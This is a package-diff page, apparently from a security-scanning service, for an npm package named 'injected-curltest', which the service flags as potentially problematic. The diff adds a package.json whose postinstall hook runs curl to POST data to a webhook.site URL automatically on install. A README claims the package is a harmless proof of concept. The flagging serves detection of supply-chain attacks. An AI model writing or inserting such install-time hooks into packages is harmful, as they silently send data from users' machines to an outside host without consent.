injected-curltest 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of injected-curltest might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/README.md +1 -0
  2. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ This package is a proof of concept. It has been uploaded for test purposes only. The code is not malicious in any way and will be deleted as soon as test will be completed.",
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "injected-curltest",
3
+ "version": "1.0.3",
4
+ "description": "This package is a proof of concept. It has been uploaded for test purposes only. The code is not malicious in any way and will be deleted as soon as test will be completed",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "curl -X POST --data-binary @- https://webhook.site/d1e93167-998d-409e-b0b3-2d81d5995eb2"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }